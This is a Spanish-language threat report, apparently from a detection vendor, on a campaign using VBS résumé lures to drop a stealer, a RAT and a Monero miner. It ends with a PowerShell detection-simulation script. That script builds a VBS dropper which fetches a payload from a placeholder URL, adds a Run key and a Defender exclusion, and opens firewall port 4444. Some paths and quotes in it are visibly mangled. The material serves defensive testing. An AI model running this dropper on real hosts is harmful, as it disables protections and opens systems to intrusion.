Análisis de FAUX#ELEVATE: Actores de Amenazas Apuntan a Francia con Señuelos de CV para Desplegar Cripto Mineros y Robadores de Información en Entornos Empresariales

Ruslan Mikhalov Jefe de Investigación de Amenazas en SOC Prime

Seguir

Análisis de FAUX#ELEVATE: Actores de Amenazas Apuntan a Francia con Señuelos de CV para Desplegar Cripto Mineros y Robadores de Información en Entornos Empresariales

Detection stack

AIDR
Alert
ETL
Query

Informe de Amenazas
Flujo de Ataque
Detecciones
Simulaciones

Resumen

Una operación de ciberdelito aprovecha un archivo de currículum VBS malicioso para atacar entornos empresariales de habla francesa. El dropper está altamente ofuscado y está diseñado para ejecutarse solo en máquinas unidas a un dominio, donde entrega malware de robo de credenciales junto con un minero de Monero. La campaña utiliza servicios de confianza como Dropbox y sitios de WordPress marroquíes comprometidos para alojar cargas útiles. Los datos robados se exfiltran a través de SMTP a mail.ru, y el malware elimina rastros después de la ejecución para reducir la visibilidad forense.

Investigación

Los investigadores realizaron ingeniería inversa del dropper VBS, descubrieron sus verificaciones de entorno y mapearon toda la cadena de infección de múltiples etapas, incluida la extracción con 7-Zip, un RAT personalizado llamado RuntimeHost.exe, el robo de credenciales del navegador ChromElevator y la actividad minera de XMRig. También identificaron infraestructura de soporte, como direcciones IP, entradas DNS dinámicas y servidores de WordPress hackeados. La persistencia estaba vinculada a claves de ejecución del registro y una tarea programada oculta.

Mitigación

Los defensores deben bloquear archivos VBS sospechosos y aplicar controles estrictos sobre los archivos adjuntos de correo electrónico. El monitoreo debe centrarse en la ejecución anormal de wscript.exe, comandos de PowerShell que agregan exclusiones de Defender y cambios en el registro que afectan a EnableLUA. Las organizaciones deben restringir el SMTP saliente de aplicaciones que no sean de correo y observar las conexiones a infraestructuras conocidas de Dropbox y pools de minería. Cualquier clave de registro o tarea programada identificada debe eliminarse o ponerse en cuarentena.

Respuesta

Los equipos de seguridad deben detectar la creación de las claves de ejecución «Microsoft Media Service» y «z_MicrosoftEdgeAutoLaunch_2EDFBF», junto con la tarea programada oculta «MicrosoftUpdateService». Deben activarse alertas en procesos de wscript.exe que se conecten a Dropbox o a los dominios de WordPress documentados. Los archivos maliciosos deben ser puestos en cuarentena, el host aislado y restablecidas las credenciales del navegador expuestas. Una revisión forense debe determinar si se exfiltraron datos robados a través de mail.ru.

"graph TB %% Definiciones de clase classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffddaa classDef technique fill:#c0c0c0 %% Definiciones de nodo step_phishing["Técnica – T1566.001 Suplantación: Archivo adjunto de Spearphishing Descripción: Correo electrónico con archivo adjunto malicioso que, al abrirse, entrega la carga inicial."] class step_phishing action step_user_execute["Técnica – T1204.002 Ejecución por Usuario: Archivo Malicioso Descripción: La víctima ejecuta el archivo VBS adjunto, activando el dropper."] class step_user_execute action step_dropper["Técnica – T1059.005 Visual Basic (VBScript) Técnica – T1027 Archivos o Información Ofuscados Descripción: El script VBS ofuscado actúa como un dropper que extrae componentes adicionales."] class step_dropper action step_domain_check["Técnica – T1069.002 Descubrimiento de Grupo de Permisos: Dominio Descripción: Verifica si el host está unido a un dominio para adaptar el comportamiento."] class step_domain_check technique step_uac_bypass["Técnica – T1548.002 Evadir el Control de Cuentas de Usuario Técnica – T1562.001 Deteriorar Defensas: Deshabilitar Herramientas de Seguridad Técnica – T1564.012 Ocultar Artefactos: Exclusiones de Defender Descripción: Eleva privilegios, deshabilita defensas y añade exclusiones."] class step_uac_bypass technique step_download["Técnica – T1102 Servicio Web Técnica – T1102.001 Resolutor de Drop Muerto Descripción: Recupera cargas adicionales desde Dropbox o ubicaciones web."] class step_download technique step_deploy_toolkit["Herramienta – RuntimeHost.exe, Minero XMRig, Ladrones de Navegador Descripción: Despliega componentes para minería, robo de credenciales y explotación adicional."] class step_deploy_toolkit tool step_cred_access["Técnica – T1555.003 Credenciales de Navegadores Web Descripción: Extrae contraseñas almacenadas en el navegador y cookies."] class step_cred_access technique step_collect_files["Técnica – T1005 Datos del Sistema Local Descripción: Reúne archivos del escritorio del usuario para exfiltración."] class step_collect_files technique step_exfiltration["Técnica – T1048.002 Exfiltración sobre Protocolo No-C2 Cifrado: SMTP Técnica – T1071.003 Protocolos Web: Protocolos de Correo Descripción: Envía datos recopilados a través de SMTP cifrado."] class step_exfiltration technique step_resource_hijack["Técnica – T1496 Secuestro de Recursos Descripción: Utiliza XMRig para minar criptomonedas en el host de la víctima."] class step_resource_hijack technique step_process_injection["Técnica – T1055 Inyección de Procesos Descripción: Inyecta código malicioso en explorer.exe para ocultar actividad."] class step_process_injection technique step_c2["Técnica – T1102 Servicio Web (HTTPS/DNS Dinámico) Descripción: Mantiene control y comando sobre tráfico web cifrado y puertos personalizados."] class step_c2 technique step_persistence["Técnica – T1547.001 Claves de Ejecución del Registro / Carpeta de Inicio Técnica – T1053 Tarea/Trabajo Programado (Oculto) Descripción: Establece persistencia a través de clave de ejecución y una tarea programada oculta."] class step_persistence technique step_cleanup["Técnica – T1070.004 Eliminación de Archivos Descripción: Elimina artefactos y registros para evadir la detección."] class step_cleanup technique %% Conexiones de borde step_phishing –>|conduce_a| step_user_execute step_user_execute –>|conduce_a| step_dropper step_dropper –>|conduce_a| step_domain_check step_domain_check –>|conduce_a| step_uac_bypass step_uac_bypass –>|conduce_a| step_download step_download –>|conduce_a| step_deploy_toolkit step_deploy_toolkit –>|habilita| step_cred_access step_deploy_toolkit –>|habilita| step_collect_files step_cred_access –>|combinado_con| step_collect_files step_cred_access –>|soporta| step_exfiltration step_collect_files –>|soporta| step_exfiltration step_deploy_toolkit –>|habilita| step_resource_hijack step_deploy_toolkit –>|habilita| step_process_injection step_process_injection –>|proporciona| step_c2 step_c2 –>|utilizado_por| step_exfiltration step_deploy_toolkit –>|establece| step_persistence step_persistence –>|seguido_por| step_cleanup step_exfiltration –>|seguido_por| step_cleanup "

Flujo de Ataque

Narrativa de Ataque y Comandos:
1. Etapa 1 – Soltar VBS malicioso: El atacante escribe un dropper VBS que descarga una carga útil de segunda etapa y escribe una clave de ejecución en el registro para persistencia.
2. Etapa 2 – Ejecutar VBS a través de wscript.exe con PowerShell como el proceso padre, satisfaciendo así la condición de padre-hijo de la detección.
3. Etapa 3 – Dentro del VBS, invocar PowerShell para agregar una exclusión de Microsoft Defender (T1562.001) y Netsh para abrir el puerto TCP 4444 de entrada (T1562.004) para C2.
4. Etapa 4 – Limpiar la evidencia después del éxito.

Script de Prueba de Regresión: (PowerShell – autónomo; ejecutar con derechos administrativos)


# -----------------------------------------------------------------------
# Malicious VBS Dropper Simulation – triggers Sigma rule:
#   Image == "*wscript.exe" AND ParentImage in ("*powershell.exe","*netsh.exe")
# -----------------------------------------------------------------------

$vbsPath = "$env:Tempmalicious_dropper.vbs"
$payloadUrl = "http://example.com/payload.exe"   # placeholder URL
$payloadPath = "$env:Temppayload.exe"

# 1. Create malicious VBS that:
#    • Downloads a payload
#    • Writes a Run key for persistence
#    • Calls PowerShell to add Defender exclusion
#    • Calls Netsh to open a firewall rule
$vbsContent = @"
Set objXML = CreateObject("Microsoft.XMLHTTP")
objXML.Open "GET", "$payloadUrl", False
objXML.Send
If objXML.Status = 200 Then
Set objStream = CreateObject("ADODB.Stream")
objStream.Type = 1
objStream.Open
objStream.Write objXML.ResponseBody
objStream.SaveToFile "$payloadPath", 2
End If

‘ Persist via Run key Set objShell = CreateObject(«WScript.Shell») objShell.RegWrite «HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious», «$payloadPath»

‘ Defender exclusion via PowerShell (executed inline) objShell.Run «powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$payloadPath'«», 0, True

‘ Open firewall port 4444 via Netsh (executed inline) objShell.Run «netsh.exe advfirewall firewall add rule name="MaliciousPort» dir=in action=allow protocol=TCP localport=4444″, 0, True «@

Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII

# 2. Launch the VBS with PowerShell as the parent process
Write-Host "[*] Launching malicious VBS via wscript.exe (parent: PowerShell)"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"wscript.exe `"$vbsPath`"`"" -Wait

# 3. Verify that firewall rule was added (optional)
netsh advfirewall firewall show rule name=MaliciousPort

# 4. Cleanup artifacts (payload & VBS) – left for separate cleanup section
Write-Host "[+] Simulation complete. Review alerts in SIEM."
```

Cleanup Commands: (run after verification)

# Eliminar regla de firewall
netsh advfirewall firewall delete rule name="MaliciousPort"

# Eliminar exclusión de Defender
powershell.exe -Command "Remove-MpPreference -ExclusionPath '$env:Temppayload.exe'"

# Borrar clave de ejecución de persistencia
reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious" /f

# Eliminar archivos
Remove-Item -Path "$env:Tempmalicious_dropper.vbs" -Force
Remove-Item -Path "$env:Temppayload.exe" -Force

Write-Host "[+] Limpieza completada."

Únete a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para tu negocio. Para ayudarte a comenzar y obtener valor inmediato, programa una reunión ahora con los expertos de SOC Prime.

Únete gratis